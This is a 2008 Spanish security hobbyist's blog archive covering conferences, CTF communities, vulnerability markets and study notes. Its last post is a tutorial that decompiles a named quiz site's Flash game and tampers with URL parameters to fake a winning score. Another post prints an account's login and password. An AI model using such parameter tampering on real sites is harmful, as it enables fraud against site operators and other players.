sábado, 6 de diciembre de 2008

Chuletilla sobre PHP de Emezeta

Mientras buscaba otra cosa di con esta chuleta sobre las funciones de php, parámetros, tipos de datos, etc. Está hecha por Manz, un buen trabajo que si sabéis php os interesará. Podría existir una de estas para cada lenguaje jeje. Está hecha en inglés pero es entendible por todos ya veréis.

Os cuento que tiene por encima, ya que poner la imagen aquí se sale de los límites jeje.

Chuleta de PHP
---------------------

Tipos de datos: boolean, integer, float...
Comentarios.
Operadores: aritméticos, de asignación, para bits, comparación...
Constantes: define, constant...
Estructuras de Control: if, while, do while, switch...
Funciones.
Funciones Matemáticas: log, rand, abs,exp...
Tipos de Caracteres: ctype_alnum, ctype_alpha...
Inclusión de Archivos: require, include...
Variables predefinidas: $GLOBALS, $GET, $POST...
Funciones URL: base64_encode, urlencode, parse_url...
Funciones para Directorios: chdir, chroot,dir, opendir...
Funciones Misceláneas: sleep, exit, eval...
Funciones para Ejecutar: exec, passthru, shell_exec, system.
Arrays: matrix, array, list...
Movimientos Básicos de Arrays: current, end, array_pop...
Métodos para Ordenar Arrays: array_multisort, array_reverse....
Arrays como sets(diferencia e intersecciones): array_intersect, array_diff...
Fecha y Hora: getdate, time, microtime...
Parámetros de fecha: date(day, week, month...).
Clase de DateTime y DateTimeZone: date_create, date_time_set...
Archivos del Sistema(funciones básicas): basename, chmod, rename, copy, glob...
Cadenas: slashes y quotes; conversions y crypt; splits; strings y chars operations; compare; print family.
Expresiones regulares: POSIX Extended RegExp y Perl Compatible RegExp

---------------------------------------------------------------------------------------
Bueno, ahí está todo lo que te vas a encontrar más completo.

Lo podéis bajar de aquí: http://www.emezeta.com/articulos/emezeta-card-php-cheat-sheet

miércoles, 3 de diciembre de 2008

DAI - Sistemas Informáticos Multiusuario y en Red(1)

Esta asignatura la tenemos dividida en bloques. Voy a enseñaros poco a poco, de que trata cada bloque en distintos posts y que podréis aprender con ellos.

El primer bloque de esta asignatura es:

COMUNICACIÓN Y REPRESENTACIÓN DE LA INFORMACIÓN

1- Introducción a la informática
2- Datos e información
3- Cualidades de la información
4- Transmisión de la información
5- Representación de la información
  • Codificación binaria
  • Codificación/Decodificación
  • Sistemas de numeración
  • Teoría Formal de la Numeración
  • Sistema binario (0,1)
  • Cambio de decimal a cualquier base
  • Paso de Base B a base C
  • Operaciones lógicas en binario(AND, OR, XOR, NOT)
  • Operaciones aritméticas en binario
  • Medidas
  • Sistema Octal (0-7)
  • Sistema Hexadecimal (0-F)
  • Representación de los números enteros (Coma fija sin signo, con signo, Complemento a 1 y a 2, en exceso a M o sesgada, BCD empaquetado y desempaquetado, Código Gray, Cod. Biquinaria y Quibinaria y el código de los 7 segmentos)
  • Representación de números reales (IEEE 754)
  • Representación de alfanuméricos (FIELDATA, BCDIC, ASCII-7, ASCII EXTENDIDO, EBCDIC, UNICODE)
6- Redundancia en la codificación
  • Código hamming
  • Códigos CRC
  • Código Huffman
  • Código corrector de dos entre 3 (2/3)

Lo más extendido es el punto 5 y 6, está algo desordenado pero en navidades si hay ganas o al final de curso o cuando ya no tenga que hacer gran cosa, poco a poco los apuntes estarán en pdf disponibles para todos, o al menos eso espero. Es mucha tarea pero se irá intentando poco a poco.

martes, 11 de noviembre de 2008

Articulo - Explotando Activex con Heap Spraying

El mes pasado en CracksLatinos enviaron al concurso un fallito ya descubierto y explotado por shinnai en el que había que conseguir explotar una vulnerabilidad en Ultra Office, que era un programita que se podía ejecutar a través del navegador.

Cuando un programa se puede ejecutar a través de el Internet Explorer como son los Activex, si éste tiene un fallo, hay formas de aprovecharse de dichos fallos de una manera muy universal, y bastante eficaz con algunas modificaciones en el exploit original de la técnica que usaremos (Heap Spraying).

Así que, stack-based buffer overflow + Activex + navegador(IE) = Heap Spraying y derivados, y tendremos el control de muchos PCs con sólo poco trabajo como podéis leer en el tuto.
Para que veáis de que trata exactamente os recomiendo que lo miréis y en internet tenéis que buscar mas información sobre ello.

Habrá una segunda parte con métodos inseguros.

Descarga: Articulos - Explotando Activex con Heap Spraying

lunes, 27 de octubre de 2008

Charla de Asegur@IT IV

La verdad que para ser la primera charla y encima de forma gratuita me llevo una muy buena impresión. Nada más llegar allí con los colegas, sin perdernos y a la primera ejje, vi a Chema el malignoo, y me presenté y aunque sea muy pro Microsoft ejje, es un tio de la hostia jeje, me presentó a un grupo de personas, entre ellos David Barroso, Anelkaos...Vamos que genial, la pena que no pude hacerme una foto con todos, jeje ya que tantas caras nuevas y tantos nombres no les termino de asociar jeje, espero que suban fotos y pongan los nombres de la gente que había por allí. También estaba Silverhack, David Carrasco, y Winsock con el que había quedado en ver.
Vamos que le pude poner cara y cuerpo a mucha gente jeje. Así que un placer conocer a todos los que me presentaron y vi, a ver si me apunto a la próxima :D. Que hoy con las prisas de mis amigos no me pude quedar después de las preguntas o me quedaba sin comer hasta las 4.30 que hubiera llegado a casa ejej.

Bueno respecto a la charla, vamos por partes:

Esteganografía 2.0

A esta charla por mi parte le faltó chicha a la hora de ver como poder ocultar uno mismo los datos, y otros modos de ocultación que no sean el del bit menos significativo, aunque al ser de los más eficaces y al tener poco tiempo pues tampoco daba tiempo para mucho más. Aprendí alguna cosilla suelta pero poco más, después de todo lo que vi en el reto de mandingo con los colegas, lo demás parece fácil jeje.

Botnets 2.0
Esta charla es la de David Barroso. Estuvo bastante chula porque habla de una realidad que toca de cerca muchos pcs jeje(que se lo digan a nuestros amigos zerafitos xD), además mostró las características de lo que tiene que tener una botnet, así como algunas famosas que hay, la verdad que se ven cosas interesantes.

RFD, descarga de ficheros con Blind SQL Injection
La del chemita, viendo la presentación ves porqué ha dado tantas charlas por el mundo, usa el Blind Sql Injection incluso para cagar jeje, la verdad que una de bastante nivel y que con conocimientos, práctica y paciencia, puede llegar a ser mortal muchas veces. Esto obliga a que aprenda bien el SQL y las bases de datos. Decir que espero la versión que uso privada, y que pronto publique el código :D.

Debian OpenSSL Bug
Decir lo primero que el Luciano Bello es otro cachondo como el Chema jeje, todo por debian, no instales ni vista ni windows 7 cuando salga sino debian :P. Esta charla muestra la peligrosidad que tiene a veces un pequeño cambio en el código que en teoría te quita todos los errores(100 creo) y te los pone en 0, pero con mucha más peligrosidad, me refiero los errores que mostraba el Valgrind, una herramienta que ayuda mucho a programadores. La cosa estaba en que calculaba una cosa de forma no muy random jeje. Bastante buena la charla también.

¿Qué está haciendo Microsoft en seguridad?
Esta decir que le pilló en una buena fecha, con la salida del bug remoto que se saltó el SDL, pero bueno...De ésta esperaba que hablase algo más de porqué se les coló el último fallo ya que estaba en la misma parte de código que un fallo anterior. Además hizo comparativas de vulnerabilidades con gráficas, pero lo que no muestra el dinero que invierte cada S.O. en mejoras, igualito el dinero que pueda gasar debian en mejoras de seguridad y en búsqueda de bugs, que lo que gasta Microsoft(Pobre Luciano Bello jeje).

Turno de preguntas
Aquí atacaron a Héctor Sánchez, el de la última charla, con preguntas un poco incómodas pero típicas, ya lo veréis cuando cuelguen los videos y el audio me imagino. Y de los demás poca cosa, al menos hasta las 2.15 que es cuando me tenía que ir.

En definitiva, una buena forma de pasar el día, desayunar jeje, hablar, aprender y conocer gente.
Espero que la próxima vez pueda estar más tiempo con todos, y si algún dia se puede y me dejan me apunto a las cervezas.

Decir que subirán los videos y avisarán en el Blog de Chema, así que estar atentos.

¡¡¡Saludos a todos los que vi por allí!!!

PD: Además del desayuno de los organizadores, los de S21Sec nos dieron otra sorpresa, aunque quitale el palo y parece otro regalo más interesante para estar seguro...jejeje




martes, 7 de octubre de 2008

Ya estoy en DAI!!!

Bueno, después de tantas vacaciones, he comenzado el curso con Desarrollo de Aplicaciones Informáticas(DAI), en teoría, en un centro con bastante prestigio de Madrid, pero hay poca gente, así que...quien sabe.

Lo elegí principalmente para aprender a programar, ya que damos 12 horas semanales de programación en C, vamos que nos vamos a cansar jeje. Así podré hacer mis programas más fácilmente y me manejaré mejor que ahora, ya que normalmente parto de un código o varios por internet y lo modifico a mi gusto, lo junto, quito cosas, etc.

Este primer año sólo damos 3 módulos bastante extensos.
  1. Programación en Lenguajes Estructurados(PLE), en C.
  2. Análisis y diseño de aplicaciones de gestión.
  3. Sistemas monousuario y multiusuario...
Ya os iré comentando cosillas a medida que vaya aprendiendo, por ahora está bien, aunque tocar el pc poco de momento ejje.

Saludosss

viernes, 3 de octubre de 2008

Retrasada la Yashira-Masters

Como era de suponer debido al poco tiempo que dimos de margen para preparar todo, y al poco tiempo que disponemos todos los admins, al final se ha retrasado sin fecha clara. Y es mejor retrasarlo y prepararlo todo correctamente que no sacarlo y que se puedan ir dando muchos errores o problemas jeje.

Mientras que lo organizamos vamos encuestando por medio de yashira a la gente el formato del torneo y el diseño de las camisetas entre otras cosas.

Además decir, que la encuesta es la siguiente:
http://www.yashira.org/index.php?showtopic=11831


Si quereis que se agregue una cuarta opcion que sería la de todos los retos abiertos, sin puntos extras y demás, y que ganase el que antes acabase de hacer todos los retos, dejar un comentario ahi diciendolo!!!
A mi esa idea me gusta, y la veo justa para todos.

domingo, 21 de septiembre de 2008

Venta de Vulnerabilidades en software

Hoy en día, muchos informáticos con conocimientos sobre vulnerabilidades, explotación de las mismas, e ingeniería inversa en general, se pueden ganar un buen sueldo con la venta de lo que descubren de forma legal, vendiéndolo a empresas que tienen clientes que proteger, y reportándolo a la empresa propietaria del software afectado o a los encargados de hacer ese software.

Actualmente, de forma legal conozco 2 y aunque habrá más, son las más conocidas. También hay otra que no es muy "legal" que se pueda decir, ya que vende vulnerabilidades a los que pongan el precio sin importar quien sea, pero con los datos del comprador en teoría, no directamente a la empresa que lo reportará a la afectada como debería ser para evitar problemas.

Os voy a hablar un poco de las 3:

ZeroDayInitiative(ZDI)
Pertenece a 3com-TippingPoint y pagan bastante bien. Es una de las 2 empresas que conozco, y la verdad, parece muy buena. Ellos te proporcionan una lista de las aplicaciones y fabricantes que seguramente acepten vulnerabilidades, y a partir de ahí, dependiendo del tipo de vulnerabilidad, uso extendido y demás de la aplicacion te pagan más o te pagan menos.
Ejemplos conocidos:

Adobe Pdf Reader 8.1.2 Local and Remote Code Execution across Web Browser --> 4000$

Adobe Flash Player 9.0.115.0 and earlier DeclareFunction2 Invalid Object Use Vulnerability --> 5500$


Sacado de infolancer - Vallejo.cc

iDefense Labs
La otra empresa que parece bastante buena y pertenece a Verisign, y que recientemente hizo algunos cambios por lo que pagará más en algunas vulnerabilidades importantes porque creo que quitaron concursos que hacían antes. Ésto me llegó al mail ya que ando registrado ahí desde hace tiempo. No tengo ninguna suma conocida, pero en la misma web que en ZDI, la de Vallejo, comenta que una vulnerabilidad con ejecución de código en algún software, de momento desconocido, le han llegado a pagar 8000$.

Wabisabilabi
Desde hace pocos días, no me aparece las que se venden actualmente, no muestra ninguna, así que no se si seguirá en funcionamiento si quiera...Ya bastante info hay de este en las noticias de internet.
Os dejo una lista de lo que se ha pagado por algunas vulns:
PostgreSQL 8.3.1 con PoC, Remota(No especifica de que tipo) --> 800 Euros
Safari 3.1 con Poc, Remota(Visitando un link seguramente) --> 300 Euros

IBM DB2 9.1.0 sin Poc, Remota --> 1050 Euros
SAP GUI v 620 con Poc x 3 Vulnerabilidades --> 5100 Euros/Vulnerabilidad


Ahi teneis lo que se ha pagado y por cuales.
http://www.wslabi.com/wabisabilabi/initAssignedBid.do?

Luego hay otras que ofrecen menos dinero y son menos conocidas, o directamente las ventas ilegales, que ahí si que te pueden pagar grandes cantidades. Pero merece la pena hacer eso y que te miren mal, pues no.

Espero que os sirva, y el día que consiga vender una, os daré mejor mi opinión, si es que algú día lo consigo, que cada bug que consigo o ya ha sido encontrado o es flojillo y no lo compran porque no les merece la pena.

viernes, 19 de septiembre de 2008

Pasan los años y el mismo software de siempre

Ya van pasando los años y muchas veces por vagueza o por falta de tiempo, mucho tiempo, no arreglan los fallos y siguen poniendo el software para que descarguen, y un usuario que no sabe mucho de fallos ni mira si es vulnerable o no lo que baja, porque como es lo último se imaginará que está sin ningún fallo público.
Pero esto con Simple Blog de 8pixel.net no pasa, tienen la versión 3.0 que es vulnerable a Sql Injection, y no la han arreglado me parece porque es del 2007 la vulnerabilidad y el parche de seguridad es a 2006 de la versión anterior. Además la versión 2.0 y 2.3 deben de estar en algún lado ya que cada 2 x 3 en un reto me envian páginas que encuentran vulenrables,y siguen saliendo después de dos años.
Aquí os dejo la prueba

Exploits públicos:
2007-07-28 SimpleBlog 3.0 (comments_get.asp id) Remote SQL Injection Vulnerability
2006-11-26 SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability
2006-09-04 SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability
2006-08-20 SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Exploit
2006-08-20 SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Vulnerability

Lista de páginas que han sido o son vulnerables desde( 03/12/2006 - 19/08/2008):
http://www.yashira.org/index.php?showtopic=10033

Fecha del primer parche de seguridad:
28/11/06
--> Me imagino que para la de comments.asp y la de id


Además muchas veces las contraseñas eran las que vienen por defecto o muy relacionadas con el nombre del sitio.

jueves, 18 de septiembre de 2008

De Vuelta

Después de ver las escalofriantes cifras que llegan a pagar por fallos tanto idefense como tippingpoint, me he animado a buscar fallos en software comercial conocido con la intención de encontrar algún fallo bueno y venderlo a ver que tal pagan, ya que pronto hay que sacarse el carnet de coche y no llega..ahora la cosa es buscar bien y probar y probar, una parte que puede llegar a ser muy aburrida.

Asi que Fuzzing, fuzzing y más fuzzing hasta encontrar algo, de momento descubri algunos que ya fueron vendidos o posteados así que nada...xD

miércoles, 10 de septiembre de 2008

Vacaciones hasta el 14

Pues eso, hasta el 14 no estaré delante de un pc, más bien hasta el día 15, así que cuidense y vayan preparándose para el torneo.

Si me llueve mucho a lo mejor hasta me meto algo, pero espero no meterme y tomar el sol un poco jiji

Byeeee

viernes, 5 de septiembre de 2008

Yashira-Masters, Cada vez queda menos


Es el nombre del nuevo torneo que se está preparando por Yashira.org por motivo de la celebración del 5º Cumpleaños de la comunidad de Yashira, tratará de abordar varios temas relacionados con la informática como son: Hacking, Scripting y HTML, Ing. Inversa, Criptografía, Esteganografía...

Comienzo del torneo:
De momento, sólo os puedo decir que será en la 2º quincena de Septiembre, o al menos se estima que será por esas fechas. Cuando lo tenga seguro hago un post de nuevo.

Reglas:
Aún por concretar aunque claro la fuerza bruta no creo que esté permitida en ninguna prueba. Eso dependerá de los retos que haya, así que tendrán que esperar.

Premios:
Camisetas/remeras conmemorativas así como el título/rango especial de "Yashira Master" el cual portarán durante un año (y que posiblemente podrán conservar en una sección especial de su perfil). Se espera poder aumentar los premios, esperar a g30rg3_x a ver que hace jeje.


Bueno a parte de todo esto, espero que participe mucha gente como pasó en blindsec o como en los retos de Chema. En especial, reto a que mandingo y chema participen por hacernos sufrir en sus retos jeje, habrá que avisarles cuando eso para ver si hay suerte y tienen disponibiidad, cosa difícil.

viernes, 29 de agosto de 2008

PHP - Auditoría del código fuente

Acostumbrado a entrar en páginas como SecurityFocus o Milw0rm, ya me canso de siempre ver lo mismo, cada segundo sale una vulnerabilidad nueva que tiene que ver con CMS, o demás en lenguaje PHP. Ya sea porque trabajan muchos programadores y aunque intenten programar de forma segura se les escape algo, o porque ni se preocupen de la seguridad, siempre hay vulnerabilidades.

Por lo que, para los vagos, o los pobres que no puedan contratar una empresa especializada, hay bastante buen código que te hace un análisis bastante eficaz.

Os dejo dos herramientas:

Skavenger:
Esta herramienta busca fallos en php, aunque modificándola puede buscar en más tipo de lenguajes mediante el uso de expresiones regulares más que nada.

DAphpscan:
Funciona mediante expresiones regulares y es bastante más completa que la anterior, busca entre otras cosas: RCE, RFI, LFI, XSS, Inyecciones SQL, CSRF, etc...Todo basandose en funciones que suelen conllevar algun peligro y que no sn filtradas adecuadamente, o no están declaradas correctamente.


Yo personalmente no las probe con código, pero con sólo ver como es el código de ambas, sobre todo de la segunda, se ve que puede detectar fácilmente fallos.
Os dejo un sitio donde hablan de la auditoría en PHP

lunes, 18 de agosto de 2008

Yashira y CracksLatinos cumplen años

Yashira
Cumple 5 años en la red, el 17 de agosto del 2003, apareció yashira como una comunidad de retos de hacking, programación, ingeniería inversa y demás cosas, y aunque antes era hackyashira. com, ahora quedó como yashira.org

En una comunidad que poco a poco aguanta con los años y con ayuda de los admins, y usuarios, han ido enviando retos, algunos de gran nivel donde aprender bastante.

Poco a poco se ha ido haciendo una gran comunidad y de las primeras web en retos de informática en español.

Además hoy mismo he tenido la suerte que me han nombrado admin del sitio, así que ahora tendré más trabajo aún ejej, cuando necesitéis algo ya sabéis, podéis consultar.

CracksLatinos
Cumple 8 años en la red, el 18 de agosto del 2000, es el lugar por excelencia de ingeniería inversa en castellano y bastante importante a nivel internacional, apareció en la epoca que había muchas páginas de crackers y grupos creo. Bastante buena como ya dije en otro post.

viernes, 1 de agosto de 2008

El trabajo de Ricardo Narvaja y el grupo CrackLatinos

Esta vez voy a hablar de la ingeniería inversa, una lista que es CrackLatinos y un autor que es Ricardo Narvaja, cuyo trabajo te da bastantes conocimientos sobre la ingeniería inversa, junto a todas las colaboraciones que se hacen a la lista de Cracklatinos por tantos autores que me extendería demasiado.

La "Introducción al Cracking con ollydbg desde cero" hecha por Ricardo Narvaja. Además de cursos actuales como el de python y otros posteriores que hará de exploiting y todos ellos de bastante buena calidad, le hacen importante en el ámbito de la ingeniería inversa.

Además te contesta siempre que puede en la lista de forma rapidísima, te ayuda y colabora bastante lo que le hace un gran tío.

Para aprender, organiza concursos de distinta temática, entre ellos:
  • Para quitar distintas protecciones que pueda traer un programa, unpacking...
  • Sacar serials a programas hechos para la labor(crackmes)
  • Exploiting, para entender como se pueden explotar los fallos en software.
Son bastante recomendables para aprender. Además en la lista, los usuarios normalmente suelen aportar con tutoriales que hacen mostrando lo que aprenden y como se hace. Un gran nivel para lo único que hace falta es tener Internet, y registrarse en la lista y cuando se pueda aportar, por supuesto.

Tenéis todo el trabajo de CrackLatinos y Ricardo en su FTP, se puede entrar mediante http://www.ricardonarvaja.info, allí se encuentran los concursos, aportaciones de la gente y obras otras cosas que podréis descubrir.
Podrás encontrar hasta un índice de las aportaciones, protecciones que trae y las técnicas antidebugging entre otras cosas.
Así que, en definitiva, pasaros por la lista o por la web si os interesa aprender sobre ingeniería inversa.
Aprovecho para saludar a la gente de allí: dapaf, boken, ricnar, apuromafo, solid, NCR, gera, karmany, etc, etc.

viernes, 11 de julio de 2008

Cambios en el Blog

Hice unos pequeños cambios en el blog, y agregué varias categorías de enlaces y demás. Para empezar:

-Mis Artículos: Lugar donde incluyo todo lo que voy escribiendo para la comunidad, y algún artículo lo meteré más adelante como inacabado, ya que hay temas en los que escribo algo, pero al poco tiempo descubro algo nuevo y megusta avanzar el tutorial y el tema, y mostrar lo que aprendí. Por ejemplo el taller, poco a poco iré escribiendo un gran tutorial más completo y junto para que no se pierda y ayude a todos.

A día de hoy está posteado los siguientes atículos:

-Mis Vulnerabilidades: Aquí irán los fallos que descubra, en principio para p1mp4m, pero los publicaré en securityfocus y demás.

Actualmente disponibles estas:


-Mis exploits: Enlaces a los exploits que he hecho, aunque tengo alguno como el VLC, preferí meterlo como artículo.

Y ahí agregaré estas pequeñas cosas con tiempo ya que irán creciendo, lo demás apartados como el de datos personales, donar, links interesantes y lo de votar, ya estaban en línea.

lunes, 30 de junio de 2008

Ser persona - Proyecto Avaaz

Avaaz es una organización sin ánimo de lucro, que recauda dinero para mandar a países que lo necesiten pero lo más importante, es su poder mediático, ya que a base de firmas con la que la gente apoya a sus proyectos, presionan a los gobiernos directamente e intentan mejorar el problema. En mi opinión, me parece una buena forma de ayudar a los que lo necesitan y que no necesitas mucho tiempo para hacerlo además. Podéis mirar los comunicados de prensa de distintos medios para ver que no parece un timo y todo su trabajo bajo el lema de "El mundo en acción".
Sólo os quitará un pequeño rato de vuestro tiempo y de este modo tal vez consigais ayudar algo si os lo habéis propuesto.

Página web: http://www.avaaz.org/es/

martes, 24 de junio de 2008

Ibercivis - Colabora con la ciencia

Ibercivis es un proyecto del CSIC que tiene distintas finalidades, entre esos proyectos están:
-Fusión (Energía de futuro, energía limpia)
-Materiales (Patrones de la Naturaleza a usar en neustra vida cotidiana)
-Proteínas (Fármacos contra el cáncer)

Para ayudar en este proyecto se pide la colaboración de las personas que tienen un ordenador principlamente y que no te va a tomar mucho tiempo en hacer una serie de pasos para instalar el software necesario.

Pasos a seguir:
Vayamos a la pagina del BOINC, programa necesario para los cálculos(Win).

http://boinc.berkeley.edu/download.php


Le damos a descargar y directamente nos lleva a la aplicación a descargar, en mi caso
es esta la versión actual.
http://boincdl.ssl.berkeley.edu/dl/boinc_5.10.45_windows_intelx86.exe

Vamos a intstalar, seguimos los pasos y damos a siguiente hasta llegar aquí.


La primera opción sólo para cuando estés en tu sesión.
La segunda para todas las sesiones, si quieres que se ayude en cualquiera, recomendable.
La tercera para que funcione como servicio, tal vez no muy recomendable ya que te deja sin algunas opciones pero funcionaría automaticamente todo el rato y es una ventaja.

Después:
Señalamos las dos opciones: Make BOINC your default screensaver, si queremos tenerlo como salvapantallas y Launch BOINC when logging on para que se ponga na mas te loguees al windows.

Finalmente instalamos.

Después pondrá un puerto a la escucha y podremos trabajar con el programa.

Para unirse al proyecto hace falta ir a:

Herramientas-Unirse a un proyecto
Ponemos la url http://registro.ibercivis.es/

Si os da pereza tener que andando registrar un usuario ahí os dejo uno, no lo modifiquéis por favor.
Usuario:trancek@p1mp4m.es
Contraseña:p1mp4m

Y listo, ya funciona sólo.

Esta página es para los que tengan linux y demas S.O.
http://boinc.berkeley.edu/download_all.php

PD:Si poneis el primero o segundo de las 3 opciones que había, agregarlo al regedit en run para que aparezca al iniciarse el pc, si no sabéis dejar un mensaje.

sábado, 14 de junio de 2008

Vacaciones en Italia

Pues ale que me voy pa Italia de vacas, quien quiera algo que me deje un correo, y para validar algunos de los retos de yashira.org molesten a los admins jejje, bueno bye byeeee

domingo, 8 de junio de 2008

Curso de Seguridad Completo

Ya que no tenía sobre que escribir, aprovecho para hacerles publicidad a informatica64. Chema Alonso y los que trabajan con él, además de alguno de S21sec me parece, van a dar un curso bastante completo que tiene pinta de ser bueno. Consta de:

Auditoría de Servidores y Clientes
Auditoria de Aplicaciones Web
Auditoría de Seguridad de Red
Auditoría Wireless, IM, VoIP y VPNs
Análisis Forense

Se puede hacer por módulos o completo, el que tiene pinta de ser muy bueno va a ser el de Aplicaciones Web, pero bueno seguro los demás también son buenos.

El problema tal vez sea la pasta gansa que cuesta, ya que hecha para atrás, pero a quien tenga le merece la pena, aprender en 6 semanas, lo que uno normal puede aprender en 3 meses por su cuenta si se pone a fondo.

Link:http://www.informatica64.com/cursoseguridad.html

viernes, 23 de mayo de 2008

Trillian muy vulnerable

Como ya le comenté hace tiempo a Juan Pablo López cuando descubrió una vulnerabilidad en Trillian poco después de que yo descubriera otra y también le comenté a boken lo mismo, les dije que trillian parecía muy vulnerable y el tiempo lo ha demostrado, está muy mal programado para ser una empresa que parece que tiene buen nivel económico. En cuestión es Cerulean Studios, y al entrar hoy en SecurityFocus, veo 3 advisories procedentes de Zero Day Initiative, lo miro a ver que es y me encuentro con el siguiente link donde está toda la información.

Gapping holes in Trillian IM client

Entre los fallos parece que hay varios fallos remotos sencillitos de explotar, ya veremos con tiempo de que se trata.

jueves, 22 de mayo de 2008

Fin de instituto

Pues ya después de tantos años...y de haber aprobado 4º con 2 aprobadas en el último momento en Septiembre,
1ºBach con 4 en Septiembre y aprobadas 2,
2ºBach con 8 + 2 de primero y aprobadas todas en Junio jiji

Lo siguiente que toca son unas merecidas vacaciones, un poco de auditoria, un poco de inyecciones, un poco de reversing, un poco de exploiting y un poco de programacion. Pero mucho veranito pa hacer lo que quieraaa!!! :P

De momento empiezo por un concurso de cracklatinos y luego ya veremos!!!

sábado, 17 de mayo de 2008

Lo nuevo de DOM-Team detenidos

Viendo las noticias a la hora de comer en antena3 derrepente aparece que han detenido a D.O.M Team, a los más nuevos porque otros viejtes que lo dejaron antes, no parece que les haya pasado nada. Me fijo en elmundo.es y se le atribuyen más ataques de lo que han hecho ellos 4 o 5 creo, porque el ranking no guarda ya todo, y que estan en un puesto número 5 de un ranking mundial de especiales(zone-h), pero si se ponen a mirar en dicho ranking, en los especiales hay 33 paginas de las cuales, de la 1 a la 6 como mucho creo que son de los que detuvieron, las otras son de sus antiguos miembros como ArCaX-ATH y otros(no lo mire poco a poco porque a mi no me pagan por hacer articulos aunque a veces se acerquen más a la realidad que los que ganan mucho xD). Y en un ranking total solo estan registrados los del 2008 del gran numero que hay, pero bueno.
Esto ha tenido a coger importancia después de que hicieran el d IU sobretodo, y es que estaban dispuestos a pagar por encontrarlo segun parecia.
La verdad que la mayoria de ataques que hacen o son inyecciones de SQL, o RFI, con saber mucho sobre ello y un poco de como localizar paginas de un mismo servidor, se pueden hacer maravillas y aunque digan que tienen el servidor superprotegido, en linux con un rooteador y en windows con algo para subirte los privilegios, tienes el servidor a tu entera disposicion. Lo que indica la inseguridad que hay en internet, y lo que se deberian gastar en proteger los servidores y no en buscar a gente que aunque les pares, el mismo fallo va a estar ahi y te lo va a saber aprovechar otro. Asi que a auditar más y a llevar a la carcel a menos :P.
Y ya no escribo más que tengo que tengo que estudiar y me da pereza seguir escibiendo.

Link de todos los defaces de D.O.M especiales

jueves, 1 de mayo de 2008

Viejo artículo sobre cutre ataques en flash

Bueno aquí os dejo un viejo artículo que hice para la ezine de un amigo, la de cicklow pero que por diversas razones al final no se publicó la ezine, como ya esta paginani existe y queda obsoleta, pues lo publico, decir que actualemtne hay páginas del mismo estilo y con mejore premios que son vulnerables, y que aunque una fue avisada hace más de un año, no la ha arreglado, tendrían que cambiar la web entera xDD, les iba a costar más dinero arreglarla que lo que la gente pueda llevarse en premios.

Edito: La página esta On de nuevo después de tanto tiempo, no se si lo habrán arreglado, lo miraré cuando no me de pereza registrarme jeje, si alguno lo mira y ve que siguen los fallos que avise al admin jeje :P, no seais malos.

--------------------------------------------------------------------------------------------------

Cómo saltarse las aplicaciones Flash para ganar en páginas web

Introducción
Hace tiempo ya, un amigo me comentó una página web en la cual se podía hacer trampas y sin comentarme nada más, me puse a investigar a ver que podía ser.

La página web en cuestión es:
http://www.futbolreto.com/ -- Actualmente, Fuera de línea.

Me registré en ella con el nombre de Antonio13 para hacer pruebas, me autentifiqué y me lleva a esta web.
http://www.futbolreto.com/login/index.php?open=aktiv


A la carga
Le damos a jugar y nos lleva a la siguiente:
http://www.futbolreto.com/login/index.php?open=secure
Le damos a ver código fuente y nos fijamos en esta parte:

[Código]
[object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="600" height="400"]
[param name="movie" value="preguntas_v5.swf?sasa=Antonio13&datum=2006-08-11" /]
[param name="quality" value="" /]
[embed src="preguntas_v5.swf?sasa=Antonio13&datum=2006-08-11" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="600" height="400"][/embed]
[/object]
[/Código]

Esta línea es interesante: preguntas_v5.swf?sasa=Antonio13&datum=2006-08-11, nos muestra como se llama el archivo Flash: preguntas_v5.swf, el nombre: sasa=Antonio13 y la fecha: datum=2006-08-11.

Bueno metemos en http://www.futbolreto.com/login/preguntas_v5.swf y observamos que es el flash de antes.
Nos lo bajamos por ejemplo con el flash get u otro acelerador de descargas y lo guardamos. Luego para ver el código de los archivos .swf nos bajamos por ejemplo el flash decompiler 2.90 que es el que tengo yo y lo abrimos con ese programa.
Si nos fijamos a la derecha vemos varias cosas como shape,image,morph,sound,video, etc. A nosotros nos interesa la parte de sprite en la cual hay 84, podemos ir mirando y tenemos que tener en cuenta las variables que tenía la url del código anterior, sasa y datum. Buscamos esas variables y nos paramos en el de sprite 219 ("mama") y nos fijamos en el archivo.
----------
usuario = -root.sasa;
puntos = _root.puntos;
fecha = _root.datum;
Y más abajo:
trace("sasa" + _root.sasa);
trace("puntos" + _root.puntos);
trace("fecha" + _root.datum);
getUrl("guardar.php", "dave", "POST");
----------

Esas son las variables que tiene en el juego para ir apuntando el usuario, fecha y puntos y la última para guardar todos los datos anteriores, así que ya tenemos todo hecho solo falta hacer una cosa.

Siendo un crack en el futbol
Si probamos con la siguiente dirección estas variables y las modificamos a nuestro gusto:
http://www.futbolreto.com/login/preguntas_v5.swf?sasa=Antonio13&puntos=28000&datum=2006-08-11
Al ir a esa dirección nos sale para jugar, cogemos cualquier categoría y le damos a responder sin marcar nada y dirá que perdimos, pero como somos unos expertos en el fútbol, como se aprecia en nuestros puntos "acumulados", vamos al ranking y aparece Antonio13 en primer lugar con 28000 puntos, así que podéis modificar eso como más os guste.
Ranking - http://www.futbolreto.com/login/index.php?open=rank
También os podéis ingeniar un programa que haga registros automáticos ya que sabéis como funciona y donde lo guarda, así que eso os lo dejo a vosotros por si queréis probar.

Viendo las respuestas a las preguntas:
Bueno, vamos a ver otras cosas interesantes a la vista. En el mismo sprite 219 ("mama"),nos fijamos en estas líneas:

[Código]
das = random(_root.npreg) + 1;
Obj1 = new LoadVars();
Obj1.load("./" +_root.ram + "/" + das + ".txt", 0);
Obj1.onload = function ()
{

titulo = Obj1.pregunta;
rta1 = Obj1.rta1;
rta2 = Obj1.rta2;
rta3 = Obj1.rta3;
rta4 = Obj1.rta4;
soplo = Obj1.soplo;
verdad = Obj1.verd;

[/Código]

